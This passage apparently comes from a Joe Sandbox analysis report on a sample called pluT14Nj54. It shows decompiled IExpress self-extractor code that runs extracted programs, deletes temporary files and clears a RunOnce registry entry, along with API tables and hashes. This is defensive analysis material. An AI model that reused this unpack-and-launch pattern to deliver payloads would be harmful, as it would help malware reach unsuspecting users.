                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E003944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					 *0x399124 = E00396285();
                                                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x003958cd
                                                                                                                                                                                                    0x003958d1
                                                                                                                                                                                                    0x003958d3
                                                                                                                                                                                                    0x003958d5
                                                                                                                                                                                                    0x003958d8
                                                                                                                                                                                                    0x003958d8
                                                                                                                                                                                                    0x003958da
                                                                                                                                                                                                    0x003958db
                                                                                                                                                                                                    0x003958e1
                                                                                                                                                                                                    0x003958ed
                                                                                                                                                                                                    0x003958f1
                                                                                                                                                                                                    0x0039591e
                                                                                                                                                                                                    0x0039592c
                                                                                                                                                                                                    0x00395943
                                                                                                                                                                                                    0x0039594a
                                                                                                                                                                                                    0x0039594d
                                                                                                                                                                                                    0x00395953
                                                                                                                                                                                                    0x00395959
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039595b
                                                                                                                                                                                                    0x0039595c
                                                                                                                                                                                                    0x00395963
                                                                                                                                                                                                    0x0039596c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395972
                                                                                                                                                                                                    0x00395974
                                                                                                                                                                                                    0x0039597a
                                                                                                                                                                                                    0x0039597a
                                                                                                                                                                                                    0x0039596c
                                                                                                                                                                                                    0x003958f3
                                                                                                                                                                                                    0x00395901
                                                                                                                                                                                                    0x00395906
                                                                                                                                                                                                    0x0039590b
                                                                                                                                                                                                    0x00395910
                                                                                                                                                                                                    0x00395910
                                                                                                                                                                                                    0x00395918

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003958E7
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395943
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039594D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039595C
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395963
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                    • API String ID: 747627703-2825630923
                                                                                                                                                                                                    • Opcode ID: c18fffc2e9e4cc21f08bec3128abd313abe5e11b78433be6aa429a87c3c83ead
                                                                                                                                                                                                    • Instruction ID: e2c19b97563b8eb955e61997e5a79f4494a039e7689d5155549848418a5fd352
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c18fffc2e9e4cc21f08bec3128abd313abe5e11b78433be6aa429a87c3c83ead
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E911263260161167DB221F7A6C4DB9B7E9DEF46360F100616F505D7291CB71884683A0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 675 393fef-394010 676 39410a-39411a call 396ce0 675->676 677 394016-39403b CreateProcessA 675->677 678 394041-39406e WaitForSingleObject GetExitCodeProcess 677->678 679 3940c4-394101 call 396285 GetLastError FormatMessageA call 3944b9 677->679 682 394091 call 39411b 678->682 683 394070-394077 678->683 694 394106 679->694 689 394096-3940b8 CloseHandle * 2 682->689 683->682 687 394079-39407b 683->687 687->682 688 39407d-394089 687->688 688->682 691 39408b 688->691 692 394108 689->692 693 3940ba-3940c0 689->693 691->682 692->676 693->692 695 3940c2 693->695 694->692 695->694
                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                    			E00393FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                    				long _v528;
                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				int _t25;
                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t45 = __edx;
                                                                                                                                                                                                    				_t20 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                    				_t39 = __ecx;
                                                                                                                                                                                                    				_t49 = 1;
                                                                                                                                                                                                    				_t22 = 0;
                                                                                                                                                                                                    				if(__ecx == 0) {
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					return E00396CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                    				if(_t25 == 0) {
                                                                                                                                                                                                    					 *0x399124 = E00396285();
                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                    					_t45 = 0x4c4;
                                                                                                                                                                                                    					E003944B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					_t49 = 0;
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t22 = _t49;
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                    				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                    				_t44 = _v528;
                                                                                                                                                                                                    				_t53 =  *0x398a28; // 0x0
                                                                                                                                                                                                    				if(_t53 == 0) {
                                                                                                                                                                                                    					_t34 =  *0x399a2c; // 0x0
                                                                                                                                                                                                    					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                    						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                    						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                    							 *0x399a2c = _t44;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E0039411B(_t34, _t44);
                                                                                                                                                                                                    				CloseHandle(_v544.hThread);
                                                                                                                                                                                                    				CloseHandle(_v544);
                                                                                                                                                                                                    				if(( *0x399a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00393fef
                                                                                                                                                                                                    0x00393ffa
                                                                                                                                                                                                    0x00394001
                                                                                                                                                                                                    0x00394008
                                                                                                                                                                                                    0x0039400a
                                                                                                                                                                                                    0x0039400b
                                                                                                                                                                                                    0x00394010
                                                                                                                                                                                                    0x0039410a
                                                                                                                                                                                                    0x0039411a
                                                                                                                                                                                                    0x0039411a
                                                                                                                                                                                                    0x0039401c
                                                                                                                                                                                                    0x0039401d
                                                                                                                                                                                                    0x0039401e
                                                                                                                                                                                                    0x0039401f
                                                                                                                                                                                                    0x00394033
                                                                                                                                                                                                    0x0039403b
                                                                                                                                                                                                    0x003940ca
                                                                                                                                                                                                    0x003940e9
                                                                                                                                                                                                    0x003940f8
                                                                                                                                                                                                    0x00394101
                                                                                                                                                                                                    0x00394106
                                                                                                                                                                                                    0x00394106
                                                                                                                                                                                                    0x00394108
                                                                                                                                                                                                    0x00394108
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394108
                                                                                                                                                                                                    0x00394049
                                                                                                                                                                                                    0x0039405c
                                                                                                                                                                                                    0x00394062
                                                                                                                                                                                                    0x00394068
                                                                                                                                                                                                    0x0039406e
                                                                                                                                                                                                    0x00394070
                                                                                                                                                                                                    0x00394077
                                                                                                                                                                                                    0x0039407f
                                                                                                                                                                                                    0x00394089
                                                                                                                                                                                                    0x0039408b
                                                                                                                                                                                                    0x0039408b
                                                                                                                                                                                                    0x00394089
                                                                                                                                                                                                    0x00394077
                                                                                                                                                                                                    0x00394091
                                                                                                                                                                                                    0x0039409c
                                                                                                                                                                                                    0x003940a8
                                                                                                                                                                                                    0x003940b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003940c2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003940c2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateProcessA.KERNELBASE ref: 00394033
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00394049
                                                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 0039405C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0039409C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003940A8
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003940DC
                                                                                                                                                                                                    • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 003940E9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3183975587-0
                                                                                                                                                                                                    • Opcode ID: 3c825322e37b862eb1c40c81a546903ff2cddfba6a4c7da0cbd673c2b3173be9
                                                                                                                                                                                                    • Instruction ID: 53db4c84678345c246eeb8c3cfc477d471d513aabc49e82a9bd77044d1a1a094
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c825322e37b862eb1c40c81a546903ff2cddfba6a4c7da0cbd673c2b3173be9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E31D431641208ABEF229F65DC49FABB77CEB94700F1002ABF505D6260CA328C82CF51
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E003951E5(void* __eflags) {
                                                                                                                                                                                                    				int _t5;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t1 = E0039468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                                                                    					if(E0039468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                    						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                    						if(_t5 != 0) {
                                                                                                                                                                                                    							_t6 = E003944B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                    							LocalFree(_t28);
                                                                                                                                                                                                    							if(_t6 != 6) {
                                                                                                                                                                                                    								 *0x399124 = 0x800704c7;
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *0x399124 = 0;
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t28);
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E003944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					LocalFree(_t28);
                                                                                                                                                                                                    					 *0x399124 = 0x80070714;
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E003944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    				 *0x399124 = E00396285();
                                                                                                                                                                                                    				goto L10;
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x003951fb
                                                                                                                                                                                                    0x00395207
                                                                                                                                                                                                    0x0039520b
                                                                                                                                                                                                    0x0039523c
                                                                                                                                                                                                    0x00395268
                                                                                                                                                                                                    0x00395270
                                                                                                                                                                                                    0x0039528b
                                                                                                                                                                                                    0x00395293
                                                                                                                                                                                                    0x0039529c
                                                                                                                                                                                                    0x003952a6
                                                                                                                                                                                                    0x003952b0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003952b0
                                                                                                                                                                                                    0x0039529e
                                                                                                                                                                                                    0x00395279
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039527b
                                                                                                                                                                                                    0x00395273
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395273
                                                                                                                                                                                                    0x0039524a
                                                                                                                                                                                                    0x00395250
                                                                                                                                                                                                    0x00395256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395256
                                                                                                                                                                                                    0x00395219
                                                                                                                                                                                                    0x00395223
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00392F4D,?,00000002,00000000), ref: 00395201
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00395250
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                      • Part of subcall function 00396285: GetLastError.KERNEL32(00395BBC), ref: 00396285
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                    • Opcode ID: 4a56c3a60be239ae926b26639e70dec1de2c97267627ec9e272c35a8e8186b24
                                                                                                                                                                                                    • Instruction ID: eb4fe2a5b5f3ea0ad6f0a82a002a8933f2a9932d97c3c448f7822acb51617463
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a56c3a60be239ae926b26639e70dec1de2c97267627ec9e272c35a8e8186b24
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB11C8B52016027BEF176B755C49F3B71ADEB89340F11482FF682D9290DA7A9C414264
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E003952B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR** _t31;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 = __edi;
                                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                                    				_t21 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_t31 =  *0x3991e0; // 0x2a78eb0
                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t29 = _t31;
                                                                                                                                                                                                    						if( *0x398a24 == 0 &&  *0x399a30 == 0) {
                                                                                                                                                                                                    							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                    							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t31 = _t31[1];
                                                                                                                                                                                                    						LocalFree( *_t29);
                                                                                                                                                                                                    						LocalFree(_t29);
                                                                                                                                                                                                    					} while (_t31 != 0);
                                                                                                                                                                                                    					_pop(_t28);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 =  *0x398a20; // 0x0
                                                                                                                                                                                                    				_pop(_t32);
                                                                                                                                                                                                    				if(_t11 != 0 &&  *0x398a24 == 0 &&  *0x399a30 == 0) {
                                                                                                                                                                                                    					_push(_t22);
                                                                                                                                                                                                    					E00391781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                    					if(( *0x399a34 & 0x00000020) != 0) {
                                                                                                                                                                                                    						E003965E8( &_v268);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                    					_t22 =  &_v268;
                                                                                                                                                                                                    					E00392390( &_v268);
                                                                                                                                                                                                    					_t11 =  *0x398a20; // 0x0
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *0x399a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                    					_t11 = E00391FE1(_t22); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *0x398a20 =  *0x398a20 & 0x00000000;
                                                                                                                                                                                                    				return E00396CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x003952b6
                                                                                                                                                                                                    0x003952b6
                                                                                                                                                                                                    0x003952b6
                                                                                                                                                                                                    0x003952c1
                                                                                                                                                                                                    0x003952c8
                                                                                                                                                                                                    0x003952cb
                                                                                                                                                                                                    0x003952cc
                                                                                                                                                                                                    0x003952d4
                                                                                                                                                                                                    0x003952d6
                                                                                                                                                                                                    0x003952d7
                                                                                                                                                                                                    0x003952de
                                                                                                                                                                                                    0x003952e0
                                                                                                                                                                                                    0x003952f2
                                                                                                                                                                                                    0x003952fa
                                                                                                                                                                                                    0x003952fa
                                                                                                                                                                                                    0x00395302
                                                                                                                                                                                                    0x00395305
                                                                                                                                                                                                    0x0039530c
                                                                                                                                                                                                    0x00395312
                                                                                                                                                                                                    0x00395316
                                                                                                                                                                                                    0x00395316
                                                                                                                                                                                                    0x00395317
                                                                                                                                                                                                    0x0039531c
                                                                                                                                                                                                    0x0039531f
                                                                                                                                                                                                    0x00395333
                                                                                                                                                                                                    0x00395345
                                                                                                                                                                                                    0x00395351
                                                                                                                                                                                                    0x00395359
                                                                                                                                                                                                    0x00395359
                                                                                                                                                                                                    0x00395363
                                                                                                                                                                                                    0x00395369
                                                                                                                                                                                                    0x0039536f
                                                                                                                                                                                                    0x00395374
                                                                                                                                                                                                    0x00395374
                                                                                                                                                                                                    0x00395381
                                                                                                                                                                                                    0x00395387
                                                                                                                                                                                                    0x00395387
                                                                                                                                                                                                    0x0039538f
                                                                                                                                                                                                    0x003953a0

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(02A78EB0,00000080,?,00000000), ref: 003952F2
                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(02A78EB0), ref: 003952FA
                                                                                                                                                                                                    • LocalFree.KERNEL32(02A78EB0,?,00000000), ref: 00395305
                                                                                                                                                                                                    • LocalFree.KERNEL32(02A78EB0), ref: 0039530C
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(003911FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00395363
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00395334
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                    • API String ID: 2833751637-1116576409
                                                                                                                                                                                                    • Opcode ID: 0ce7d724652095b5d7202bacd00a3c5312a5fb2e726a9c7d9c0c0b369ce43b64
                                                                                                                                                                                                    • Instruction ID: 7aa0efa7229d03f6dbab7cb6225dcf3e489ef2e60c61078501f6841044a3eef3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ce7d724652095b5d7202bacd00a3c5312a5fb2e726a9c7d9c0c0b369ce43b64
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D321A135501A04EFDF239B24EC49B6977A8FB44750F05025BE886962A0CFB25CC4CB84
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00391FE1(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				if( *0x398530 != 0) {
                                                                                                                                                                                                    					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                    						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                    						return RegCloseKey(_v8);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x00391fee
                                                                                                                                                                                                    0x00392005
                                                                                                                                                                                                    0x0039200d
                                                                                                                                                                                                    0x00392017
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392020
                                                                                                                                                                                                    0x0039200d
                                                                                                                                                                                                    0x00392029

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0039538C,?,?,0039538C), ref: 00392005
                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(0039538C,wextract_cleanup1,?,?,0039538C), ref: 00392017
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(0039538C,?,?,0039538C), ref: 00392020
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                    • API String ID: 849931509-1592051331
                                                                                                                                                                                                    • Opcode ID: 2c3ada135dd6083089893b25a85918a53d67e61dd767d76e306f6b826aff6787
                                                                                                                                                                                                    • Instruction ID: 3fd196843f3a32659a5f6ac4ab0261e131a22acadcd791d439ae2739fb9aefb0
